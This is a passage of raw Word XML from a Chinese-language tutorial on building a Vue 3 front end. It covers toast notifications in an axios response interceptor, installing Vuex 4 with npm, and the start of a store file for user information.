        <w:t xml:space="preserve">                .then(res =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D41570" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20474C38" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    console.log(res)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A43D4B6" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47443830" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    // // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提示成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2C5CC3" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    // ElNotification({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EF57B8" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    //     message: "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录成功</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1004EE23" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    //     type: 'sucess',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28306259" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    //     duration: 3000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6339BB8F" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    // })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BBD183" w14:textId="38DD44E0" w:rsidR="00BF31AD" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB15BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>toast("</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB15BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>登录成功</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB15BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>", "success")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B616EDF" w14:textId="77777777" w:rsidR="00BF31AD" w:rsidRDefault="00BF31AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43E74A83" w14:textId="2FA9585B" w:rsidR="00BF31AD" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>axios.</w:t>
      </w:r>
      <w:r>
        <w:t>js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中更改</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2253D7" w14:textId="77777777" w:rsidR="00BF31AD" w:rsidRPr="00181907" w:rsidRDefault="00BF31AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04CD27E2" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加响应拦截器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7FC1D2" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>service.interceptors.response.use(function (response) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393B8263" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对响应数据做点什么</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B05D56D" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return response.data.data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D978AF" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  }, function (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F7B35B" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对响应错误做点什么</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A88578" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17153D83" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB15BA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>toast(error.response.data.msg, "error")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E59A3E" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="175AF339" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    //     ElNotification({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17319C1D" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    //     // title: 'Error',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653EC62C" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    //     message: error.response.data.msg || "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求失败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34456452" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    //     type: 'error',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65266B90" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    //     duration: 3000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF961FC" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    // })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3330BEE3" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7017E919" w14:textId="77777777" w:rsidR="00DB15BA" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return Promise.reject(error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF72731" w14:textId="60564DBB" w:rsidR="00BF31AD" w:rsidRDefault="00DB15BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA72C3D" w14:textId="77777777" w:rsidR="00BF31AD" w:rsidRDefault="00BF31AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A58E4CC" w14:textId="77777777" w:rsidR="00BF31AD" w:rsidRDefault="00BF31AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F4E2844" w14:textId="13C0A1B7" w:rsidR="00BF31AD" w:rsidRDefault="00F61F11" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="697" w:name="_Toc159780127"/>
      <w:r w:rsidRPr="00F61F11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引入</w:t>
      </w:r>
      <w:r w:rsidRPr="00F61F11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vuex</w:t>
      </w:r>
      <w:r w:rsidRPr="00F61F11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态管理用户信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="697"/>
    </w:p>
    <w:p w14:paraId="746BC7D0" w14:textId="77777777" w:rsidR="00BF31AD" w:rsidRDefault="00BF31AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62077EEE" w14:textId="62D767A7" w:rsidR="00116EF6" w:rsidRPr="00116EF6" w:rsidRDefault="00116EF6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00116EF6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>因为我们使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00116EF6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vue</w:t>
      </w:r>
      <w:r w:rsidRPr="00116EF6">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00116EF6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的版本，所以</w:t>
      </w:r>
      <w:r w:rsidRPr="00116EF6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vuex</w:t>
      </w:r>
      <w:r w:rsidRPr="00116EF6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>必须使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00116EF6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00116EF6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DD745D" w14:textId="714F8FB8" w:rsidR="00BF31AD" w:rsidRPr="00F61F11" w:rsidRDefault="00116EF6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00116EF6">
        <w:t>https://vuex.vuejs.org/zh/guide/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC61316" w14:textId="59760DF3" w:rsidR="00BF31AD" w:rsidRDefault="008A59AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21020729" wp14:editId="6B9E1ACB">
            <wp:extent cx="5274310" cy="1271270"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="973624646"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24646" name="图片 1" descr="图形用户界面, 文本&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId202"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1271270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D72421" w14:textId="1E835C8F" w:rsidR="00BF31AD" w:rsidRPr="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>安装包：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE8705D" w14:textId="77777777" w:rsidR="001C1D72" w:rsidRPr="001C1D72" w:rsidRDefault="001C1D72" w:rsidP="009222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2C3E50"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C1D72">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="F08D49"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r w:rsidRPr="001C1D72">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="EEEEEE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001C1D72">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="F08D49"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>install</w:t>
      </w:r>
      <w:r w:rsidRPr="001C1D72">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="EEEEEE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> vuex@next </w:t>
      </w:r>
      <w:r w:rsidRPr="001C1D72">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="7EC699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>--save</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709210FA" w14:textId="77777777" w:rsidR="00BF31AD" w:rsidRDefault="00BF31AD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EA244ED" w14:textId="77885581" w:rsidR="00BF31AD" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>新建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>store</w:t>
      </w:r>
      <w:r>
        <w:t>/index.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067E3ABD" w14:textId="77777777" w:rsidR="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27847218" w14:textId="27F1AE0C" w:rsidR="00BA2E79" w:rsidRPr="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { createStore } from 'vuex'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F19D60B" w14:textId="77777777" w:rsidR="00BA2E79" w:rsidRPr="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>创建一个新的</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> store </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>实例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3516DF" w14:textId="77777777" w:rsidR="00BA2E79" w:rsidRPr="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const store = createStore({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BB4FAA" w14:textId="77777777" w:rsidR="00BA2E79" w:rsidRPr="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    state() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EC00C2" w14:textId="77777777" w:rsidR="00BA2E79" w:rsidRPr="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        return {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE5B757" w14:textId="77777777" w:rsidR="00BA2E79" w:rsidRPr="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            // </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>用户信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B76C88" w14:textId="77777777" w:rsidR="00BA2E79" w:rsidRPr="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            user:{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECB74D8" w14:textId="77777777" w:rsidR="00BA2E79" w:rsidRPr="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4E81B3" w14:textId="77777777" w:rsidR="00BA2E79" w:rsidRPr="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D273FC" w14:textId="77777777" w:rsidR="00BA2E79" w:rsidRPr="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    mutations: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B88115" w14:textId="77777777" w:rsidR="00BA2E79" w:rsidRPr="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            // </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>记录用户信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693CEA41" w14:textId="77777777" w:rsidR="00BA2E79" w:rsidRPr="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            SET_USERINFO(state, user){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F3A178" w14:textId="77777777" w:rsidR="00BA2E79" w:rsidRPr="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                state.user = user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D865AF9" w14:textId="77777777" w:rsidR="00BA2E79" w:rsidRPr="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265CEF41" w14:textId="77777777" w:rsidR="00BA2E79" w:rsidRPr="00BA2E79" w:rsidRDefault="00BA2E79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E79">
        <w:rPr>
